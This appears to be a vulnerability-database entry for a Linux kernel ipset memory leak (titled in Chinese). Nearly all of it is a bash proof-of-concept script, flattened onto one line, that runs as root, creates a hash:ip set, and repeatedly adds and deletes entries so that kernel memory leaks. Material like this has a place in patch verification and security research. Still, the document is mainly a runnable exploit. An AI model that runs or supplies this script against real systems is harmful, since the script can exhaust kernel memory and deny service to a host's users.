CVE-2026-31418 Linux内核ipset内存泄漏漏洞

#!/bin/bash # PoC for CVE-2026-31418: Trigger memory leak in ipset # This script simulates the condition where buckets are not freed. SET_NAME="poc_test_set" # Check if running as root (required for ipset) if [ "$EUID" -ne 0 ]; then echo "Please run as root" exit fi # Load required modules modprobe ip_set modprobe ip_set_hash_ip # Create a hash:ip set ipset create $SET_NAME hash:ip echo "Starting PoC loop..." # Loop to create and delete entries to trigger the bug # Repeatedly adding and deleting entries can cause the bucket pointer (n->pos) # to remain non-zero even when empty, preventing release. for i in {1..10000}; do # Add entries for j in {1..100}; do ipset add $SET_NAME 192.168.1.$j 2>/dev/null done # Delete entries to trigger the cleanup logic for j in {1..100}; do ipset del $SET_NAME 192.168.1.$j 2>/dev/null done if [ $((i % 100)) -eq 0 ]; then echo "Iteration $i completed. Check slabtop for memory increase." fi done echo "PoC execution finished." # Cleanup ipset destroy $SET_NAME